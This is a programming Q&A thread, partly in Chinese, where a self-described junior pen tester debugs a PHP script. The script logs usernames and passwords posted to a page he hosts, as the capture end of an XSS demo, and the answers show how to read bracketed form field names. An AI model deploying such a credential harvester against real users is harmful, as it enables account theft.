PHP脚本未保存已发布的数据变量

Question

I'm a (junior) pen tester and I'm trying to make a script to demonstrate the dangers of an XSS attack to a client. I've got a php script that is meant to log user:pass combos when victims (ie myself in the demo) are redirected to a malicious page I'm hosting.

This is the part of the source for the login:

<input  type="text" id="form_login_username" name="form[login][username]" value=""       class="large" />
<input  type="password" id="form_login_password" name="form[login][password]" value="" class="large" />

I'm new to php so it might be something really basic that's cause the problem. Here is my php script to log the details:

<?PHP
$filename = "login_details.txt";
$username = $_POST["form[login][username]"]; 
$password = $_POST["form[login][password]"];
$fh = fopen($filename, "aw") or die("cannot open file");
fwrite($fh, $username . ":" . $password . "\r\n");
fclose($fh);

With this script I get:

 Notice: Undefined index: form[login][username] in...

And the same for the password.

I added in isset to see if the variables are even being set, and they're not.

I know the script does work, as I tried it with a few other simple login pages and it's worked perfectly. The only difference is that the username and password post variables in this case have square brackets in them - could this be the issue? I have tried url encoding them but to no avail :(

Any ideas where I'm going wrong? Thank you =)

Answer 1

Because the valid way to access your variables is

$_POST['form']['login']['username']

Just perform var_dump($_POST); and see what your post contains

Answer 2

Try this instead, in your form name attributes...

name="formUsername"
name="formPasswd"

In your receiving script...

$username = $_POST['formUsername']; 
$password = $_POST['formPasswd];

Answer 3

您在该字段周围是否有<form action="youscript.php" method="post"> ？